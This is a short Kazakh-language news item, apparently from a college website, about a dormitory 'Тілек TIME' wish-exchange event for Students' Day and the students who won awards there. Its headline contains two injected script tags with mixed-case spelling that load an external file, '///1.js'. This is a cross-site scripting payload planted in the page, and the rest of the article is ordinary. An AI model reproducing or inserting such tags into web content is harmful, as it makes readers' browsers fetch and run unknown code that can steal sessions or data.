«Тілек TIME» шарасы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.11.2021
Студенттер күні жатақханада да аталып өтті. Білім алушылардың екінші үйінде тәрбиешілер, комендант, жатақхана кеңесінің ұйымдастыруымен «Тілек TIME» шарасы жүргізілді. Ондағы мақсат – студенттерді мейірімділікке тәрбиелеу, ынтымақтарын арттыру, жақсы көңіл-күй сыйлау. Әр қабатқа үлкен конверттер ілініп, оған білім алушылар бір-біріне арнаған тілектерін салды. Екі күнге жалғасқан шара соңында лебіздерін өлеңмен өрген, айрықша ашықхат жасаған шығармашыл жастарға мадақтама табысталды. Ерекше көзге түскен ФБ-42 тобының студенті Хуандак Айым, А-11 тобының студенті Өтегенова Диана және студкеңес мүшесі Мархаба Берденбек арнайы сыйлықтармен марапатталды.
Просмотров: 481


Пікір қосу



Деректерді қолтаңбаға қосу